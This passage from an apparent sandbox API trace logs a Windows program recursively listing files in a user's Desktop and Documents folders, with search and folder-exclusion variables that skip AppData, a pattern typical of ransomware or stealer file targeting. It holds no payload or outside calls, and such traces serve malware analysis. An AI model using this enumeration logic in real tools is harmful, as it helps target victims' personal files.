dwReserved0=0x770000, dwReserved1=0x777648, cFileName="tjNI", cAlternateFileName="")) returned 1 [0028.958] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.958] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a99f50, ftCreationTime.dwHighDateTime=0x1d5c0e3, ftLastAccessTime.dwLowDateTime=0x2eacd810, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x2eacd810, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a99f50, ftCreationTime.dwHighDateTime=0x1d5c0e3, ftLastAccessTime.dwLowDateTime=0x2eacd810, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x2eacd810, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0xa6e56f60, ftLastWriteTime.dwHighDateTime=0x1d5ba03, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x4, dwReserved1=0x777648, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681bcef0, ftCreationTime.dwHighDateTime=0x1d5b666, ftLastAccessTime.dwLowDateTime=0xc4a5bca0, ftLastAccessTime.dwHighDateTime=0x1d5c0b4, ftLastWriteTime.dwLowDateTime=0xc4a5bca0, ftLastWriteTime.dwHighDateTime=0x1d5c0b4, nFileSizeHigh=0x0, nFileSizeLow=0x1575, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="EVqXht.wav", cAlternateFileName="")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0xad2c0a0, ftLastWriteTime.dwHighDateTime=0x1d5b684, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x10, dwReserved1=0x777648, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xa6fb2b30, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 1 [0028.958] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36b04690, ftCreationTime.dwHighDateTime=0x1d5bccc, ftLastAccessTime.dwLowDateTime=0xf60992a0, ftLastAccessTime.dwHighDateTime=0x1d5c2fb, ftLastWriteTime.dwLowDateTime=0xf60992a0, ftLastWriteTime.dwHighDateTime=0x1d5c2fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="lK15Vz5k", cAlternateFileName="")) returned 1 [0028.959] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\*", lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36b04690, ftCreationTime.dwHighDateTime=0x1d5bccc, ftLastAccessTime.dwLowDateTime=0xf60992a0, ftLastAccessTime.dwHighDateTime=0x1d5c2fb, ftLastWriteTime.dwLowDateTime=0xf60992a0, ftLastWriteTime.dwHighDateTime=0x1d5c2fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2380 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36b04690, ftCreationTime.dwHighDateTime=0x1d5bccc, ftLastAccessTime.dwLowDateTime=0xf60992a0, ftLastAccessTime.dwHighDateTime=0x1d5c2fb, ftLastWriteTime.dwLowDateTime=0xf60992a0, ftLastWriteTime.dwHighDateTime=0x1d5c2fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x7f98f740, ftLastWriteTime.dwHighDateTime=0x1d5c185, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x4, dwReserved1=0x777648, cFileName="5EM8.avi", cAlternateFileName="")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x54c02d10, ftLastWriteTime.dwHighDateTime=0x1d5b9fe, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="b9ol1.avi", cAlternateFileName="")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f62b900, ftCreationTime.dwHighDateTime=0x1d5c31a, ftLastAccessTime.dwLowDateTime=0x5360f1c0, ftLastAccessTime.dwHighDateTime=0x1d5c17e, ftLastWriteTime.dwLowDateTime=0x5360f1c0, ftLastWriteTime.dwHighDateTime=0x1d5c17e, nFileSizeHigh=0x0, nFileSizeLow=0xf4c4, dwReserved0=0x10, dwReserved1=0x777648, cFileName="R99f_hoG0iVXG.xls", cAlternateFileName="R99F_H~1.XLS")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0xf3fa9760, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x10, dwReserved1=0x777648, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd128870, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x7f36d240, ftLastAccessTime.dwHighDateTime=0x1d5b83e, ftLastWriteTime.dwLowDateTime=0x7f36d240, ftLastWriteTime.dwHighDateTime=0x1d5b83e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="wTgKl2xg7Q876LP8ABsN", cAlternateFileName="WTGKL2~1")) returned 1 [0028.959] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\*", lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd128870, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x7f36d240, ftLastAccessTime.dwHighDateTime=0x1d5b83e, ftLastWriteTime.dwLowDateTime=0x7f36d240, ftLastWriteTime.dwHighDateTime=0x1d5b83e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2440 [0028.959] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd128870, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x7f36d240, ftLastAccessTime.dwHighDateTime=0x1d5b83e, ftLastWriteTime.dwLowDateTime=0x7f36d240, ftLastWriteTime.dwHighDateTime=0x1d5b83e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.959] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0xdd7f2430, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x4, dwReserved1=0x777648, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 1 [0028.960] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x1b00026, ftCreationTime.dwLowDateTime=0x36b54a, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x1f, ftLastWriteTime.dwHighDateTime=0x1a80027, nFileSizeHigh=0x36b54a, nFileSizeLow=0x7c5a78, dwReserved0=0x10, dwReserved1=0x777648, cFileName="␰?\x08", cAlternateFileName="⌘{?jဓĩ\x10")) returned 0 [0028.960] FindClose (in: hFindFile=0x7c2440 | out: hFindFile=0x7c2440) returned 1 [0028.960] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0xd73a5b0, ftLastWriteTime.dwHighDateTime=0x1d5b641, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 1 [0028.960] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d88b1e0, ftCreationTime.dwHighDateTime=0x1d5be72, ftLastAccessTime.dwLowDateTime=0x7e10b2e0, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x7e10b2e0, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x42e1, dwReserved0=0x10, dwReserved1=0x777648, cFileName="yRQDF_aSfhekn.m4a", cAlternateFileName="YRQDF_~1.M4A")) returned 1 [0028.960] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x1940037, ftCreationTime.dwLowDateTime=0x36b57c, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x19, ftLastWriteTime.dwHighDateTime=0x1960038, nFileSizeHigh=0x36b57c, nFileSizeLow=0x7c2020, dwReserved0=0x10, dwReserved1=0x777648, cFileName="yR\x08", cAlternateFileName="Ⅰ{?jဓĩ\x10")) returned 0 [0028.961] FindClose (in: hFindFile=0x7c2380 | out: hFindFile=0x7c2380) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x54d03240, ftLastWriteTime.dwHighDateTime=0x1d5c378, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x3fe3c5a0, ftLastWriteTime.dwHighDateTime=0x1d5b756, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x10, dwReserved1=0x777648, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x1700048, ftCreationTime.dwLowDateTime=0x36b5ae, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1720049, nFileSizeHigh=0x36b5ae, nFileSizeLow=0x2b, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="?j\x08", cAlternateFileName="Ẹ{jဓĩ\x10")) returned 0 [0028.961] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x479a5890, ftLastWriteTime.dwHighDateTime=0x1d5b689, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1460059, ftCreationTime.dwLowDateTime=0x36b5d3, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x13c005a, nFileSizeHigh=0x36b5d3, nFileSizeLow=0x27, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="j\x08", cAlternateFileName="᳘{jဓĩ\x10")) returned 0 [0028.961] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0xb2371be0, ftLastWriteTime.dwHighDateTime=0x1d5b6f0, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x2c0674d0, ftLastWriteTime.dwHighDateTime=0x1d5b605, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x3c201e00, ftLastWriteTime.dwHighDateTime=0x1d5c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x10, dwReserved1=0x777648, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 1 [0028.961] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f229230, ftCreationTime.dwHighDateTime=0x1d5c271, ftLastAccessTime.dwLowDateTime=0x61c07740, ftLastAccessTime.dwHighDateTime=0x1d5ba49, ftLastWriteTime.dwLowDateTime=0x61c07740, ftLastWriteTime.dwHighDateTime=0x1d5ba49, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0x10, dwReserved1=0x777648, cFileName="yMGnX teTW q8biNT2J.avi", cAlternateFileName="YMGNXT~1.AVI")) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x9efc70e0, ftLastWriteTime.dwHighDateTime=0x1d5c21a, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ZUXz.avi", cAlternateFileName="")) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe74f0990, ftCreationTime.dwHighDateTime=0x1d5c506, ftLastAccessTime.dwLowDateTime=0xb2382ea0, ftLastAccessTime.dwHighDateTime=0x1d5bf46, ftLastWriteTime.dwLowDateTime=0xb2382ea0, ftLastWriteTime.dwHighDateTime=0x1d5bf46, nFileSizeHigh=0x0, nFileSizeLow=0x13bb6, dwReserved0=0x10, dwReserved1=0x777648, cFileName="_WgswrxrAQIdMFU5.wav", cAlternateFileName="_WGSWR~1.WAV")) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x126006a, ftCreationTime.dwLowDateTime=0x36b639, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x12e006b, nFileSizeHigh=0x36b639, nFileSizeLow=0x7c1110, dwReserved0=0x10, dwReserved1=0x777648, cFileName="_W\x08", cAlternateFileName="ᩘ{jဓĩ\x10")) returned 0 [0028.962] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f6ff990, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f6ff990, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0028.962] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0028.962] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f6ff990, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f6ff990, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f6ff990, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f6ff990, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0xd381df0, ftLastWriteTime.dwHighDateTime=0x1d55e4a, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 1 [0028.962] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f24930, ftCreationTime.dwHighDateTime=0x1d577da, ftLastAccessTime.dwLowDateTime=0x228bf7c0, ftLastAccessTime.dwHighDateTime=0x1d5a79d, ftLastWriteTime.dwLowDateTime=0x228bf7c0, ftLastWriteTime.dwHighDateTime=0x1d5a79d, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0x10, dwReserved1=0x777648, cFileName="3xhPX7.xlsx", cAlternateFileName="3XHPX7~1.XLS")) returned 1 [0028.963] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0xf13a8410, ftLastWriteTime.dwHighDateTime=0x1d5738b, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x10, dwReserved1=0x777648, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x20ab7280, ftLastWriteTime.dwHighDateTime=0x1d552db, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x10, dwReserved1=0x777648, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x23634540, ftLastWriteTime.dwHighDateTime=0x1d5b4e0, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x65595e60, ftLastWriteTime.dwHighDateTime=0x1d5ac04, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x10, dwReserved1=0x777648, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54bf33a0, ftCreationTime.dwHighDateTime=0x1d554dd, 